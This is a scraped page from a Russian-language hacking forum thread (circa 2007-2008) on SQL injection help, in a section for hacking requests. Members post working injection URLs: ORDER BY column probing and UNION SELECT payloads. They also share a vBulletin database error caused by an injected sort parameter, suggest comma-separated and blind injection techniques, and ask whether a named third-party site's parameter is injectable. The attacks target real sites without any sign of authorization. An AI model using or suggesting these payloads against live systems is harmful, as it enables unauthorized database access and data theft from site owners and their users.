HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 15 из 41 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #141  
Старый 29.12.2007, 12:36
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Почему такая фигня, подобрал order-ом количество столбцов:
bad_script.php?id=28&mon=12&years=2007&ids=-1+order+by+4/*
и все нармально, вывода ошибки нету, начинаю вывод
bad_script.php?id=28&mon=12&years=2007&ids=-1+union+select+1,2,3,4/*
и пипец:
The used SELECT statements have a different number of columns
Но ордером все нормально подобралось, че может быть не так?
 

  #142  
Старый 29.12.2007, 12:44
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию
Цитата:
Сообщение от AkyHa_MaTaTa  
Почему такая фигня, подобрал order-ом количество столбцов:
bad_script.php?id=28&mon=12&years=2007&ids=-1+order+by+4/*
и все нармально, вывода ошибки нету, начинаю вывод
bad_script.php?id=28&mon=12&years=2007&ids=-1+union+select+1,2,3,4/*
и пипец:
The used SELECT statements have a different number of columns
Но ордером все нормально подобралось, че может быть не так?
Скорее всего там идет два select и выводится второй, а в нем большее число колонок
 

  #143  
Старый 29.12.2007, 12:49
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
Ага, все допер, спасибо ++
 

  #144  
Старый 30.12.2007, 12:50
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Код:
<!-- Database error in vBulletin 3.6.8: Invalid SQL: SELECT userid, adminid,paramdate, liftdate, reason FROM userban WHERE liftdate > 0 ORDER BY paramdate order by 10-- ASC; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 10-- ASC' at line 1 Error Number : 1064 Date : Sunday, December 30th 2007 @ 11:46:25 AM Script : http://xxx.xxx/forum/script.php?by=paramdate+order+by+10-- Referrer : IP Address : xx.xx.xx.xx Username : незарегистрированный Classname : vB_Database -->
Что это ткое?
 

  #145  
Старый 31.12.2007, 17:24
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
эмммм
ссылочку дай
 

  #146  
Старый 02.01.2008, 03:44
Noiro
Познающий
Регистрация: 01.01.2008
Сообщений: 50
Провел на форуме:
187422

Репутация: 71
По умолчанию
Цитата:
Сообщение от it's my  
Что это ткое?
Если еще актуально, то ORDER BY там уже есть, перечисление должно быть через запятую :
/forum/script.php?by=paramdate,%3210%32--%32
юнион после ордер не воткнуть ЕМНИП, но можно попробовать слепую иньекцию сделать.
 

  #147  
Старый 02.01.2008, 10:35
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию
Spyder, ссылочка в ПМ
 

  #148  
Старый 03.01.2008, 05:46
Virus_C
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Цитата:
Сообщение от it's my  
Код:
<!-- Database error in vBulletin 3.6.8: Invalid SQL: SELECT userid, adminid,paramdate, liftdate, reason FROM userban WHERE liftdate > 0 ORDER BY paramdate order by 10-- ASC; MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 10-- ASC' at line 1 Error Number : 1064 Date : Sunday, December 30th 2007 @ 11:46:25 AM Script : http://xxx.xxx/forum/script.php?by=paramdate+order+by+10-- Referrer : IP Address : xx.xx.xx.xx Username : незарегистрированный Classname : vB_Database -->
Что это ткое?
eta bug
 

  #149  
Старый 03.01.2008, 07:12
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию
надо чистые шприцы юзать для инъекций - в этом суть
 

  #150  
Старый 09.01.2008, 12:35
big_BRAT
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655

Репутация: 168
Отправить сообщение для big_BRAT с помощью ICQ
По умолчанию
нужна помощь с этой ссылкой http://sp ec.pr oclub.ru/modules/tests/test/courses/course1.php?course=27
если подставить в параметр кавычку но ругается, но не скл ошибку хотя вполне вероятно что из-за неверного запроса, так вот есть тут иньекция или нет?
ругательство прилагается))))
Цитата:
Warning: endconnection(/home/plr/public_html/test/inc/error.html): failed to open stream: No such file or directory in /home/plr/public_html/spec/modules/tests/test/inc/connect.php on line 70
 
 
Страница 15 из 41 « Первая < 5 11 12 13 14 15 16 17 18 19 25 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ